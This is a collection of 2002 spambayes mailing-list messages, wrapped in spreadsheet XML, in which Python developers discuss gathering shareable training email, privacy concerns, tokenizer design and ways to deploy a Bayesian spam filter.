    <t xml:space="preserve">On 05 September 2002, Tim Peters said:
&gt; Greg Ward is
&gt; currently capturing a stream coming into python.org, and I hope we can get a
&gt; more modern, and cleaner, test set out of that.Not yet -- still working on the required config changes.  But I have a
cunning plan...&gt; But if that stream contains
&gt; any private email, it may not be ethically possible to make that available.It will!  Part of my cunning plan involves something like this:  if folder == "accepted":             # ie. not suspected junk mail
      if (len(recipients) == 1 and
          recipients[0] in ("guido@python.org", "barry@python.org", ...)):
          folder = "personal"If you (and Guido, Barry, et. al.) prefer, I could change that last
statement to "folder = None", so the mail won't be saved at all.  I
*might* also add a "and sender doesn't look like -bounce-*, -request,
-admin, ..." clause to that if statement.&gt; Can you think of anyplace to get a large, shareable ham sample apart from a
&gt; public mailing list?  Everyone's eager to share their spam, but spam is so
&gt; much alike in so many ways that's the easy half of the data collection
&gt; problem.I believe the SpamAssassin maintainers have a scheme whereby the corpus
of non-spam is distributed, ie. several people have bodies of non-spam
that they use for collectively evolving the SA score set.  If that
sounds vague, it matches my level of understanding.        Greg
-- 
Greg Ward                          http://www.gerg.ca/
Reality is for people who can't handle science fiction.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I believe the SpamAssassin maintainers have a scheme whereby the corpus
&gt; of non-spam is distributed, ie. several people have bodies of non-spam
&gt; that they use for collectively evolving the SA score set.  If that
&gt; sounds vague, it matches my level of understanding.See if you can get a hold of that so we can do a level-playing-field
competition. :-)--Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">On 06 September 2002, Anthony Baxter said:
&gt; A snippet, hopefully not enough to trigger the spam-filters.As an aside: one of the best ways to dodge SpamAssassin is by having an
In-Reply-To header.  Most list traffic should meet this criterion.Alternately, I can whitelist mail to spambayes@python.org -- that'll
work until spammers get ahold of the list address, which usually seems
to take a few months.        Greg
-- 
Greg Ward                          http://www.gerg.ca/
Gee, I feel kind of LIGHT in the head now, knowing I can't make my
satellite dish PAYMENTS!
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;&gt;&gt;&gt; "TP" == Tim Peters  writes:    &gt;&gt; Any thought to wrapping up your spam and ham test sets for
    &gt;&gt; inclusion w/ the spambayes project?    TP&gt; I gave it all the thought it deserved .  It would be
    TP&gt; wonderful to get several people cranking on the same test
    TP&gt; data, and I'm all in favor of that.  OTOH, my Data/ subtree
    TP&gt; currently has more than 35,000 files slobbering over 134
    TP&gt; million bytes -- even if I had a place to put that much stuff,
    TP&gt; I'm not sure my ISP would let me email it in one msg .Check it into the spambayes project.  SF's disks are cheap .-Barry
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Check it into the spambayes project.  SF's disks are cheap .Perhaps more useful would be if Tim could check in the pickle(s?)
generated by one of his training runs, so that others can see how
Tim's training data performs against their own corpora.  This could
also be the starting point for a self-contained distribution (you've
got to start with *something*, and training with python-list data
seems just as good as anything else).--Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;&gt;&gt;&gt; "GW" == Greg Ward  writes:    GW&gt; If you (and Guido, Barry, et. al.) prefer, I could change that
    GW&gt; last statement to "folder = None", so the mail won't be saved
    GW&gt; at all.I don't care if the mail is foldered on python.org, but personal
messages regardless of who they're for, shouldn't be part of the
public spambayes repository unless specifically approved by both the
recipient and sender.Note also that we are much more liberal about python.org/zope.org
mailing list traffic than most folks.  Read list-managers for any
length of time and you'll find that there are a lot of people who
assert strict copyright over their collections, are very protective of
their traffic, and got really pissed when gmane just started
gatewaying their messages without asking.Which might be an appropriate for their lists, but not for ours (don't
think I'm suggesting we do the same -- I /like/ our laissez-faire
approach).But for personal email, we should be more careful.
-Barry
</t>
  </si>
  <si>
    <t xml:space="preserve">Quite independently from testing and tuning the algorithm, I'd like to
think about deployment.Eventually, individuals and postmasters should be able to download a
spambayes software distribution, answer a few configuration questions
about their mail setup, training and false positives, and install it
as a filter.A more modest initial goal might be the production of a tool that can
easily be used by individuals (since we're more likely to find
individuals willing to risk this than postmasters).There are many ways to do this.  Some ideas:-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non-spam.  To train it, you'd only
  need to send it the false negatives somehow; it can assume that
  anything is ham that you don't say is spam within 48 hours.- A server with a custom protocol that you send a copy of a message
  and that answers "spam" or "ham".  Then you have a little program
  that is invoked e.g. by procmail that talks to the server.  (The
  server exists so that it doesn't have to load the pickle with the
  scoring database for each message.  I don't know how big that pickle
  would be, maybe loading it each time is fine.  Or maybe
  marshalling.)- Your idea here.Takers?  How is ESR's bogofilter packaged?  SpamAssassin?  The Perl
Bayes filter advertised on slashdot?--Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;&gt;&gt;&gt; "GvR" == Guido van Rossum  writes:    GvR&gt; Perhaps more useful would be if Tim could check in the
    GvR&gt; pickle(s?)  generated by one of his training runs, so that
    GvR&gt; others can see how Tim's training data performs against their
    GvR&gt; own corpora.He could do that too. :)-Barry
</t>
  </si>
  <si>
    <t>On 6 Sep 2002 at 10:31, Guido van Rossum wrote:&gt;   your mail, and gives you only the non-spam.  To train it, you'd only need
&gt;   to send it the false negatives somehow; it can assume that anything is
&gt;   ham that you don't say is spam within 48 hours.I have folks who leave their email programs running 24 hours a day, constantly polling 
for mail. If they go away for a long weekend, lots of "friday night spam" will become 
ham on sunday night.  (Friday night seems to be the most popular time)
&gt; - Your idea here.Ultimately I'd like to see tight integration into the "most popular email clients".. As a 
stop-gap to the auto-ham ..How about adding an IMAP server with a spam and deleted-ham folder. Most email 
clients can handle IMAP. Users should be able to quickly move "spam" into the spam 
folder. Instead of deleting messages (or, by reprogramming the delete function) they can 
quickly move ham into the ham folder.In either case, the message would be processed and then destroyed.
Brad Clements,                bkc@murkworks.com   (315)268-1000
http://www.murkworks.com                          (315)268-9812 Fax
AOL-IM: BKClements</t>
  </si>
  <si>
    <t>[Tim]
&gt; OTOH, my Data/ subtree currently has more than 35,000 files slobbering
&gt; over 134 million bytes -- even if I had a place to put that much stuff,
&gt; I'm not sure my ISP would let me email it in one msg .[Skip]
&gt; Do you have a dialup or something more modern ?Much more modern:  a cable modem with a small upload rate cap.  There's a
reason the less modern uncapped @Home went out of business .&gt; 134MB of messages zipped would probably compress pretty well - under 50MB
&gt; I'd guess with all the similarity in the headers and such.  You could zip
&gt; each of the 10 sets individually and upload them somewhere.I suppose this could finish over the course of an afternoon.  Now where's
"somewhere"?  I expect we'll eventually collect several datasets;
SourceForge isn't a good place for it (they expect projects to distribute
relatively small code files, and complain if even those get big).&gt; ...
&gt; How about random sampling lots of public mailing lists via gmane or
&gt; something similar, manually cleaning it (distributing that load over a
&gt; number of people) and then relying on your clever code and your
&gt; rebalancing script to help further cleanse it?What then are we training the classifier to do?  Graham's scoring scheme is
based on an assumption that the ham-vs-spam task is *easy*, and half of that
is due to that the ham has a lot in common.  It was an experiment to apply
his scheme to all the comp.lang.python traffic, which is a lot broader than
he had in mind (c.l.py has long had a generous definition of "on topic"
).  I don't expect good things to come of making it ever broader,
*unless* your goal is to investigate just how broad it can be made before it
breaks down.&gt; The "problem" with the ham is it tends to be much more tied to one person
&gt; (not just intimate, but unique) than the spam.Which is "a feature" from Graham's POV:  the more clues, the better this
"smoking guns only" approach should work.&gt; I save all incoming email for ten days (gzipped mbox format) before it
rolls
&gt; over and disappears.  At any one time I think I have about 8,000-10,000
&gt; messages.  Most of it isn't terribly personal (which I would cull before
&gt; passing along anyway) and much of it is machine-generated, so would be of
&gt; marginal use.  Finally, it's all ham-n-spam mixed together.  Do we call
&gt; that an omelette or a Denny's Grand Slam?Unless you're volunteering to clean it, tag it, package it, and distribute
it, I'd call it irrelevant .</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt;   your mail, and gives you only the non-spam.  To train it, you'd only need
&gt; &gt;   to send it the false negatives somehow; it can assume that anything is
&gt; &gt;   ham that you don't say is spam within 48 hours.
&gt; 
&gt; I have folks who leave their email programs running 24 hours a day,
&gt; constantly polling for mail. If they go away for a long weekend,
&gt; lots of "friday night spam" will become ham on sunday night.
&gt; (Friday night seems to be the most popular time)So we'll make this a config parameter.&gt; &gt; - Your idea here.
&gt; 
&gt; Ultimately I'd like to see tight integration into the "most popular
&gt; email clients".. As a stop-gap to the auto-ham ..What's an auto-ham?&gt; How about adding an IMAP server with a spam and deleted-ham
&gt; folder. Most email clients can handle IMAP. Users should be able to
&gt; quickly move "spam" into the spam folder.I personally don't think IMAP has a bright future, but for people who
do use it, that's certainly a good approach.&gt; Instead of deleting messages (or, by reprogramming the delete
&gt; function) they can quickly move ham into the ham folder.Yes.--Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t>[Anthony Baxter]
&gt; I've got a test set here that's the last 3 and a bit years email to
&gt; info@ekit.com and info@ekno.com - it's a really ugly set of 20,000+
&gt; messages, currently broken into 7,000 spam, 9,000 ham, 9,000 currently
&gt; unclassified. These addresses are all over the 70-some different
&gt; ekit/ekno/ISIConnect websites, so they get a LOT of spam.
&gt;
&gt; As well as the usual spam, it also has customers complaining about
&gt; credit card charges, it has people interested in the service and
&gt; asking questions about long distance rates, &amp;c &amp;c &amp;c. Lots and lots
&gt; of "commercial" speech, in other words. Stuff that SA gets pretty
&gt; badly wrong.Can this corpus be shared?  I suppose not.&gt; I'm currently mangling it by feeding all parts (text, html, whatever
&gt; else :) into the filters, as well as both a selected number of headers
&gt; (to, from, content-type, x-mailer), and also a list of (header,
&gt; count_of_header). This is showing up some nice stuff - e.g. the
&gt; X-uidl that stoopid spammers blindly copy into their messages.If we ever  have a shared corpus, an easy refactoring of timtest
should allow to plug in different tokenizers.  I've only made three changes
to Graham's algorithm so far (well, I've made dozens -- only three survived
testing as proven winners), all the rest has been refining the tokenization
to provide better clues.&gt; I did have Received in there, but it's out for the moment, as it causes
&gt; rates to drop.That's ambiguous.  Accuracy rates or error rates, ham or spam rates?&gt; I'm also stripping out HTML tags, except for href="" and src="" - there's
&gt; so so much goodness in them (note that I'm only keeping the contents of
&gt; the attributes).Mining embedded http/https/ftp thingies cut the false negative rate in half
in my tests (not keying off href, just scanning for anything that "looked
like" one); that was the single biggest f-n improvement I've seen.  It
didn't change the false positive rate.  So you know whether src added
additional power, or did you do both at once?</t>
  </si>
  <si>
    <t xml:space="preserve">
    Guido&gt; Takers?  How is ESR's bogofilter packaged?  SpamAssassin?  The
    Guido&gt; Perl Bayes filter advertised on slashdot?Dunno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file).Basic procmail usage goes something like this:    :0fw
    | spamassassin -P    :0
    * ^X-Spam-Status: Yes
    $SPAMWhich just says, "Run spamassassin -P reinjecting its output into the
processing stream.  If the resulting mail has a header which begins
"X-Spam-Status: Yes", toss it into the folder indicated by the variable
$SPAM.SpamAssassin also adds other headers as well, which give you more detail
about how its tests fared.  I'd like to see spambayes operate in at least
this way: do its thing then return a message to stdout with a modified set
of headers which further processing downstream can key on.Skip</t>
  </si>
  <si>
    <t>Did you want this on the list? I'm replying to the list..On 6 Sep 2002 at 10:43, Guido van Rossum wrote:&gt; What's an auto-ham?Automatically marking something as ham after a given timeout.. regardless of how long 
that timeout is, someone is going to forget to submit the message back as spam. How many spams-as-hams can be accepted before the f-n rate gets unacceptable?
&gt; &gt; How about adding an IMAP server with a spam and deleted-ham
&gt; &gt; folder. Most email clients can handle IMAP. Users should be able to
&gt; &gt; quickly move "spam" into the spam folder.
&gt; 
&gt; I personally don't think IMAP has a bright future, but for people who
&gt; do use it, that's certainly a good approach.
&gt; 
&gt; &gt; Instead of deleting messages (or, by reprogramming the delete
&gt; &gt; function) they can quickly move ham into the ham folder.
&gt; 
&gt; Yes.I view IMAP as a stop-gap measure until tighter integration with various email clients 
can be achieved.I still feel it's better to require classification feedback from the recipient, rather than 
make any assumptions after some period of time passes. But this is an end-user issue 
and we're still at the algorithm stage.. ;-)
Brad Clements,                bkc@murkworks.com   (315)268-1000
http://www.murkworks.com                          (315)268-9812 Fax
AOL-IM: BKClements</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; What's an auto-ham?
&gt; 
&gt; Automatically marking something as ham after a given
&gt; timeout.. regardless of how long that timeout is, someone is going
&gt; to forget to submit the message back as spam.OK, here's a refinement.  Assuming very little spam comes through, we
only need to pick a small percentage of ham received as new training
ham to match the new training spam.  The program could randomly select
a sufficient number of saved non-spam msgs and ask the user to
validate this selection.  You could do this once a day or week (config
parameter).&gt; How many spams-as-hams can be accepted before the f-n rate gets
&gt; unacceptable?Config parameter.&gt; I view IMAP as a stop-gap measure until tighter integration with
&gt; various email clients can be achieved.
&gt; 
&gt; I still feel it's better to require classification feedback from the
&gt; recipient, rather than make any assumptions after some period of
&gt; time passes. But this is an end-user issue and we're still at the
&gt; algorithm stage.. ;-)I'm trying to think about the end-user issues because I have nothing
to contribute to the algorithm at this point.  For deployment we need
both!--Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Dunno about the other tools, but SpamAssassin is a breeze to incorporate
&gt; into a procmail environment.  Lots of people use it in many other ways.  For
&gt; performance reasons, many people run a spamd process and then invoke a small
&gt; C program called spamc which shoots the message over to spamd and passes the
&gt; result back out.  I think spambayes in incremental mode is probably fast
&gt; enough to not require such tricks (though I would consider changing the
&gt; pickle to an anydbm file).
&gt; 
&gt; Basic procmail usage goes something like this:
&gt; 
&gt;     :0fw
&gt;     | spamassassin -P
&gt; 
&gt;     :0
&gt;     * ^X-Spam-Status: Yes
&gt;     $SPAM
&gt; 
&gt; Which just says, "Run spamassassin -P reinjecting its output into the
&gt; processing stream.  If the resulting mail has a header which begins
&gt; "X-Spam-Status: Yes", toss it into the folder indicated by the variable
&gt; $SPAM.
&gt; 
&gt; SpamAssassin also adds other headers as well, which give you more detail
&gt; about how its tests fared.  I'd like to see spambayes operate in at least
&gt; this way: do its thing then return a message to stdout with a modified set
&gt; of headers which further processing downstream can key on.Do you feel capable of writing such a tool?  It doesn't look too hard.--Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">
    &gt;&gt; Ultimately I'd like to see tight integration into the "most popular
    &gt;&gt; email clients"..The advantage of using a kitchen sink (umm, make that highly programmable)
editor+email package like Emacs+VM is that you can twiddle your key bindings
and write a little ELisp (or Pymacs) glue to toss messages in the right
direction (spam or ham).  For this, spambayes would have to operate in an
incremental fashion when fed a single ham or spam message.(No, I have no idea what an "auto-ham" is.  A pig run over by a car,
perhaps?)give-a-dog-a-bone-ly, y'rs,Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">
    &gt;&gt; Dunno about the other tools, but SpamAssassin is a breeze ...
    &gt;&gt; SpamAssassin also adds other headers as well, which give you more
    &gt;&gt; detail ...    Guido&gt; Do you feel capable of writing such a tool?  It doesn't look too
    Guido&gt; hard.Sure, but at the moment I have to stop reading email for a few hours and do
some real work. ;-) I'll see if I can modify GBayes.py suitably over the
weekend.Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">Guido van Rossum wrote:
&gt; I personally don't think IMAP has a bright future, but for people who
&gt; do use it, that's certainly a good approach.Writing an IMAP server is a non-trivial task.  The specification is huge
and clients do all kinds of weird stuff.  POP is very easy in
comparison.  Perhaps you could forward messages to a special address or
save them in a special folder to mark them as false negatives.Alternatively,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don't like and add them to the
training set.  Neil
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;&gt;&gt;&gt; "NS" == Neil Schemenauer  writes:    NS&gt; Writing an IMAP server is a non-trivial task.That's what I've been told by everyone I've talked to who's actually
tried to write one.
    NS&gt; Alternatively, perhaps there could be a separate protocol and
    NS&gt; client that could be used to review additions to the training
    NS&gt; set.  Each day a few random spam and ham messages could be
    NS&gt; grabbed as candidates.  Someone would periodically startup the
    NS&gt; client, review the candidates, reclassify or remove any
    NS&gt; messages they don't like and add them to the training set.I think people will be much more motivated to report spam than ham.  I
like the general approach that copies of random messages will be
sequestered for some period of time before they're assumed to be ham.
Matched with a simple spam reporting scheme, this could keep the
training up to date with little effort.  I've sketched out an approach
a listserver like Mailman could do along these lines and if I get some
free time I'll hack something together.I like the idea of a POP proxy which is classifying messages as
they're pulled from the server.  The easiest way for such a beast to
be notified of spam might be to simply save the spam in a special
folder or file that the POP proxy would periodically consult.-Barry
</t>
  </si>
  <si>
    <t>On Fri, 6 Sep 2002, Guido van Rossum wrote:&gt;Quite independently from testing and tuning the algorithm, I'd like to
&gt;think about deployment.
&gt;
&gt;Eventually, individuals and postmasters should be able to download a
&gt;spambayes software distribution, answer a few configuration questions
&gt;about their mail setup, training and false positives, and install it
&gt;as a filter.
&gt;
&gt;A more modest initial goal might be the production of a tool that can
&gt;easily be used by individuals (since we're more likely to find
&gt;individuals willing to risk this than postmasters).My impression is that a pre-collected corpus would not fit most individuals
very well, but each individual (or group?) should collect their own corpus.One problem that comes upp immediately: individuals are lazy.If I currently get 50 spam and 50 ham a day, and I'll have to
press the 'delete' button once for each spam, I'll be happy
to press the 'spam' button instead.  However, if in addition
have to press a 'ham' button for each ham, it starts to look
much less like a win to me.  Add the time to install and setup
the whole machinery, and I'll just keep hitting delete.The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I'll end up with spam in the ham, anyways.I would like to look for a way to deal with spam in the ham.The obvious thing to do is to trigger on the 'spam' button,
and at that time look for messages similar to the deleted one
in the ham corpus, and simply remove them.  To do this we
need a way to compare two word count histograms, to see
how similar they are.  Any ideas ?Also, I personally would prefer to not see the spam at all.
If they get bounced (preferably already in the SMTP),
false positives become the senders problem, to rewrite
to remove the spam smell.In a well tuned system then, there spam corpus will be much
smaller than the ham corpus, so it would be possible to be
slightly over-agressive when clearing potential spam from
the ham corpus.  This should make it easier to keep it clean.Having a good way to remove spam from the ham corpus,
there's less need to worry about it getting there by mistake,
and we might as well simply add all messages to the ham corpus,
that didn't get deleted by the spam filtering.It might also be useful to have a way to remove messages from
the spam corpus, in case of user ooops.	/Paul</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I guess MUA-level filtering is just a fallback for people who don't have
&gt; 1) a burning, all-consuming hatred of junk mail, 2) root access to all
&gt; mail servers they rely on, and 3) the ability and inclination to install
&gt; an MTA with every bell and whistle tweaked to keep out junk mail.Sure.  But for most people, changing their company's or ISP's server
requires years of lobbying, while they have total and immediate
control over their own MUA.That said, I agree that we should offer a good solution to
postmasters, and I trust that your ideas are right on the mark!--Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t>I think one step towards deployment is creating a re-usable tokenizer
for mail messages.  The current codebase doesn't expose an easy-to-use
or easy-to-customize tokenizer.The timtest module seems to contain an enormous body of practical
knowledge about how to parse mail messages, but the module wasn't
designed for re-use.  I'd like to see a module that can take a single
message or a collection of messages and tokenize each one.I'd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others.Jeremy</t>
  </si>
  <si>
    <t>[Barry A. Warsaw, gives answers and asks questions]Here's the code that produced the header tokens:    x2n = {}
    for x in msg.keys():
        x2n[x] = x2n.get(x, 0) + 1
    for x in x2n.items():
        yield "header:%s:%d" % x
Some responses:&gt;  0.01    19  3559 'header:X-Mailman-Version:1'
&gt;  0.01    19  3559 'header:List-Id:1'
&gt;  0.01    19  3557 'header:X-BeenThere:1'
&gt;
&gt; These three are definitely MM artifacts, although the second one
&gt; /could/ be inserted by other list management software (it's described
&gt; in an RFC).Since all the ham came from Mailman, and only 19 spam had it, it's quite
safe to assume then that I should ignore these for now.&gt;  0.01     0  3093 'header:Newsgroups:1'
&gt;  0.01     0  3054 'header:Xref:1'
&gt;  0.01     0  3053 'header:Path:1'
&gt;
&gt; These aren't MM artifacts, but are byproducts of gating a message off
&gt; of an nntp feed.  Some of the other NNTP-* headers are similar, but I
&gt; won't point them out below.I should ignore these too then.&gt;  0.01    19  2668 'header:List-Unsubscribe:1'
&gt;  0.01    19  2668 'header:List-Subscribe:1'
&gt;  0.01    19  2668 'header:List-Post:1'
&gt;  0.01    19  2668 'header:List-Help:1'
&gt;  0.01    19  2668 'header:List-Archive:1'
&gt;
&gt; RFC recommended generic listserve headers that MM injects.Ditto.&gt; So why do you get two entries for this one?
&gt;
&gt;  0.99   519     0 'header:Received:8'
&gt;  0.99   466     1 'header:Received:7'Read the code .  The first line counts msgs that had 8 instances of a
'Received' header, and the second counts msgs that had 7 instances.  I
expect this is a good clue!  The more indirect the mail path, the more of
those thingies we'll see, and if you're posting from a spam trailer park in
Tasmania you may well need to travel thru more machines.&gt; ...
&gt; Note that header names are case insensitive, so this one's no
&gt; different than "MIME-Version:".  Similarly other headers in your list.Ignoring case here may or may not help; that's for experiment to decide.
It's plausible that case is significant, if, e.g., a particular spam mailing
package generates unusual case, or a particular clueless spammer
misconfigures his package.&gt;  0.02    65  3559 'header:Precedence:1'
&gt;
&gt; Could be Mailman, or not.  This header is supposed to tell other
&gt; automated software that this message was automated.  E.g. a replybot
&gt; should ignore any message with a Precedence: {bulk|junk|list}.Rule of thumb:  if Mailman inserts a thing, I should ignore it.  Or, better,
I should stop trying to out-think the flaws in the test data and get better
test data instead!&gt;  0.50     4     0 'header:2:1'
&gt;
&gt; !?
&gt; ...
&gt;  0.50     0     2 'header:'
&gt;
&gt; Heh?I sucked out all the wordinfo keys that began with "header:".  The last line
there  was probably due to unrelated instances of the string "header:" in
message bodies.  Harder to guess about the first line.&gt; ...
&gt; Some headers of course are totally unreliable as to their origin.  I'm
&gt; thinking stuff like MIME-Version, Content-Type, To, From, etc, etc.
&gt; Everyone sticks those in.The brilliance of Anthony's "just count them" scheme is that it requires no
thought, so can't be fooled .  Header lines that are evenly
distributed across spam and ham will turn out to be worthless indicators
(prob near 0.5), so do no harm.</t>
  </si>
  <si>
    <t>[Anthony Baxter]
&gt; The other thing on my todo list (probably tonight's tram ride home) is
&gt; to add all headers from non-text parts of multipart messages. If nothing
&gt; else, it'll pick up most virus email real quick.See the checkin comments for timtest.py last night.  Adding this code gave a
major reduction in the false negative rate:def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'&gt;'I *suspect* most of that stuff didn't make any difference, but I put it all
in as one blob so don't know which parts did and didn't help.</t>
  </si>
  <si>
    <t xml:space="preserve">
    TP&gt; A false positive *really* has to work hard then, eh?  The long
    TP&gt; quote of a Nigerian scam letter is one of the two that made
    TP&gt; it, and spamprob() looked at all this stuff before deciding it
    TP&gt; was spam:Here's an interesting thing to test: discriminate words differently if
they are on a line that starts with `&gt;' or, to catch styles like
above, that the first occurance on a line of &lt; or &gt; is &gt; (to eliminate
html).Then again, it may not be worth trying to un-false-positive that
Nigerian scam quote.-Barry
</t>
  </si>
  <si>
    <t xml:space="preserve">So then, Guido van Rossum  is all like:&gt; &gt; Basic procmail usage goes something like this:
&gt; &gt; 
&gt; &gt;     :0fw
&gt; &gt;     | spamassassin -P
&gt; &gt; 
&gt; &gt;     :0
&gt; &gt;     * ^X-Spam-Status: Yes
&gt; &gt;     $SPAM
&gt; &gt; 
&gt; 
&gt; Do you feel capable of writing such a tool?  It doesn't look too hard.Not to beat a dead horse, but that's exactly what my spamcan package
did.  For those just tuning in, spamcan is a thingy I wrote before I
knew about Tim &amp; co's work on this crazy stuff; you can download it from
, but I'm not going
to work on it anymore.I'm currently writing a new one based on classifier (and timtest's
booty-kicking tokenizer).  I'll probably have something soon, like maybe
half an hour, and no, it's not too hard.  The hard part is storing the
data somewhere.  I don't want to use ZODB, as I'd like something a
person can just drop in with a default Python install.  So anydbm is
looking like my best option.I already have a setup like this using Xavier Leroy's SpamOracle, which
does the same sort of thing.  You call it from procmail, it adds a new
header, and then you can filter on that header.  Really easy.Here's how I envision this working.  Everybody gets four new mailboxes:  train-eggs
  train-spam
  trained-eggs
  trained-spamYou copy all your spam and eggs* into the "train-" boxes as you get it.
How frequently you do this would be up to you, but you'd get better
results if you did it more often, and you'd be wise to always copy over
anything which was misclassified.  Then, every night, the spam fairy
swoops down and reads through your folders, learning about what sorts of
things you think are eggs and what sorts of things are spam.  After she's
done, she moves your mail into the "trained-" folders.This would work for anybody using IMAP on a Unix box, or folks who read
their mail right off the server.  I've spoken with some fellows at work
about Exchange and they seem to beleive that Exchange exports
appropriate functionality to implement a spam fairy as well.Advanced users could stay ahead of the game by reprogramming their mail
client to bind the key "S" to "move to train-spam" and "H" to "move to
train-eggs".  Eventually, if enough people used this sort of thing, it'd
start showing up in mail clients.  That's the "delete as spam" button
Paul Graham was talking about.* The Hormel company might not think well of using the word "ham" as the
  opposite of "spam", and they've been amazingly cool about the use of
  their product name for things thus far.  So I propose we start calling
  non-spam something more innocuous (and more Monty Pythonic) such as
  "eggs".Neale
</t>
  </si>
  <si>
    <t>[Jeremy Hylton]
&gt; I think one step towards deployment is creating a re-usable tokenizer
&gt; for mail messages.  The current codebase doesn't expose an easy-to-use
&gt; or easy-to-customize tokenizer.tokenize() couldn't be easier to use:  it takes a string argument, and
produces a stream of tokens (whether via explicit list, or generator, or
tuple, or ... doesn't matter).  All the tokenize() functions in GBayes.py
and timtest.py are freely interchangeable this way.Note that we have no evidence to support that a customizable tokenizer would
do any good, or, if it would, in which ways customization could be helpful.
That's a research issue on which no work has been done.&gt; The timtest module seems to contain an enormous body of practical
&gt; knowledge about how to parse mail messages, but the module wasn't
&gt; designed for re-use.That's partly a failure of imagination .  Splitting out all knowledge
of tokenization is just a large block cut-and-paste ... there, it's done.
Change the    from timtoken import tokenizeat the top to use any other tokenizer now.  If you want to make it easier
still, feel free to check in something better.&gt; I'd like to see a module that can take a single message or a collection of
&gt; messages and tokenize each one.The Msg and MsgStream classes in timtest.py are a start at that, but it's
hard to do anything truly *useful* here when people use all sorts of
different physical representations for email msgs (mboxes in various
formats, one file per "folder", one file per msg, Skip's gzipped gimmick,
...).  If you're a Python coder , you *should* find it very easy to
change the guts of Msg and MsgStream to handle your peculiar scheme.
Defining interfaces for these guys should be done.&gt; I'd like to see the tokenize by customizable, too.  Tim had to exclude
&gt; some headers from his test data, because there were particular biases
&gt; in the test data.  If other people have test data without those
&gt; biases, they ought to be able to customize the tokenizer to include
&gt; them or exclude others.This sounds like a bottomless pit to me, and there's no easier way to
customize than to edit the code.  As README.txt still says, though, massive
refactoring would help.  Hop to it!</t>
  </si>
  <si>
    <t xml:space="preserve">I think that when considering deployment, a solution that supports all
Python platforms and not just the L|Unix crowd is desirable.Mac and PC users are more apt to be using a commercial MUA that's unlikely
to offer hooking ability (at least not easily). As mentioned elsewhere, even
L|Unix users may find an MUA solution easier to use then getting it added to
their MTA. (SysOps make programmers look like flaming liberals ;).)My notion of a solution for Windows/Outlook has been, as Guido described, a
client-server. Client side does pop3/imap/mapi fetching (of which, I'm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scheme.Outbound mail would use a direct path from the MUA to the MTA. Hopefully all
MUAs can split the host fetch/send URL'sIMO, end users are likely to be more intested in n-way classification. If
this is available, the "simple viewer" could be enhanced to support viewing
via folders and (at least for me) the Outlook nightmare is over - I would
use this as my only MUA. (N.B. according to my recent readings, the best
n-way classifier uses something called a "Support Vector Machine" (SVM)
which is 5-8% more accurate then Naive Bayes (NB) ).I wonder if the focus of spambayes ought not to be a classifier that leaves
the fetching and feeding of messages to auxillary code? That way, it could
be dropped into whatever harness that suited the user's situation.David LeBlanc
Seattle, WA USA
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I wonder if the focus of spambayes ought not to be a classifier that
&gt; leaves the fetching and feeding of messages to auxillary code? That
&gt; way, it could be dropped into whatever harness that suited the
&gt; user's situation.I see no reason to restrict the project to developing the classifier
and leave the deployment to others.  Attempts at deployment in the
real world will surely provide additional feedback for the classifier.--Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">On 06 September 2002, Tim Peters said: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package.Case of headers is definitely helpful.  SpamAssassin has a rule for it
-- if you have headers like "DATE" or "SUBJECT", you get a few more
points.        Greg
-- 
Greg Ward                          http://www.gerg.ca/
God is omnipotent, omniscient, and omnibenevolent
---it says so right here on the label.
</t>
  </si>
  <si>
    <t xml:space="preserve">
    Greg&gt; In case it wasn't obvious, I'm a strong proponent of filtering
    Greg&gt; junk mail as early as possible, ie. right after the SMTP DATA
    Greg&gt; command has been completed.  Filtering spam at the MUA just seems
    Greg&gt; stupid to me -- by the time it gets to me MUA, the spammer has
    Greg&gt; already stolen my bandwidth.  The two problems I see with filtering that early are:    1. Everyone receiving email via that server will contribute ham to the
       stew, making the Bayesian classification less effective.    2. Given that there will be some false positives, you absolutely have to
       put the mail somewhere.  You can't simply delete it.  (I also don't
       like the TMDA-ish business of replying with a msg that says, "here's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time.Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">On Friday 06 September 2002 20:48, Skip Montanaro wrote:
&gt;     Greg&gt; In case it wasn't obvious, I'm a strong proponent of
&gt; filtering Greg&gt; junk mail as early as possible, ie. right after the
&gt; SMTP DATA Greg&gt; command has been completed.  Filtering spam at the
&gt; MUA just seems Greg&gt; stupid to me -- by the time it gets to me MUA,
&gt; the spammer has Greg&gt; already stolen my bandwidth.
&gt;
&gt; The two problems I see with filtering that early are:
&gt;
&gt;     1. Everyone receiving email via that server will contribute ham
&gt; to the stew, making the Bayesian classification less effective.
&gt;
&gt;     2. Given that there will be some false positives, you absolutely
&gt; have to put the mail somewhere.  You can't simply delete it.  (I also
&gt; don't like the TMDA-ish business of replying with a msg that says,
&gt; "here's what you do to really get your message to me."  That puts an
&gt; extra burden on my correspondents.)  As an individual, I would prefer
&gt; you put spammish messages somewhere where I can review them, not an
&gt; anonymous sysadmin who I might not trust with my personal email
&gt; (nothing against you Greg ;-).
&gt;
&gt; I personally prefer to manage this stuff at the user agent level. 
&gt; Bandwidth is a heck of a lot cheaper than my time.
&gt;I see no reason why both approaches could and should not be used.
MTA level filtering would just need to use a different corpus, one that 
would contain illegal or otherwise commonly unapproved material for the 
group of people using that MTA.   I'm sure that such an approach would 
significantly reduce the mail traffic as a first step, without  giving  
